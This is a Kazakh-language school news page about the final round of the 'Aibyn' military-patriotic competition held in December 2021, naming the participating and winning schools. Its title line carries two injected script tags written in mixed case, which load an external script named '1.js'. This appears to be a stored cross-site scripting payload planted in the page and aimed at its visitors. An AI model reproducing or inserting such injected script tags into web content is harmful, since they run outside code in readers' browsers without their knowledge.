«Айбын» ӘПК мектеп оқушыларының арасында ақтық сын жарысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.12.2021

  2021 жылдың 14 желтоқсан күні Қазақстан Республикасының Тәуелсіздігінің 30 жылдығына орай, әскери-спорттық «Айбын» ӘПК мектеп оқушыларының арасында ақтық сын жарысы Ақмол ауылы орта мектебінде  өтті. Жарысқа әр аумақтан 1-2 орын алған командалар  Ақмол,  Қызылжар, Қабанбай батыр, Родина, Ы.Алтынсарин, Талапкер, Жанажайнақ, Қажымұқан, Нұресіл және Қосшы қаласы №2 орта мектебінің арнайы кадет сыныбы оқушылары қатысты. Байқаудың мақсаты жоғары патриоттық сананы, өз Отанына деген адал сезімін қалыптастыру, облыстық «Айбын» сайысына команда іріктеу.

      Сайыс қорытындысы командалық 1-орынды Ақмол ОМ, 2-орынды Нұресіл ОМ, 3-орын Қажымұқан ОМ оқушылары иеленді. Жеңімпаз командаларды құттықтаймыз! Өрендерімізге алдағы сайыстарда сәттілік серік болсын!  

Просмотров: 750


Пікір қосу



Деректерді қолтаңбаға қосу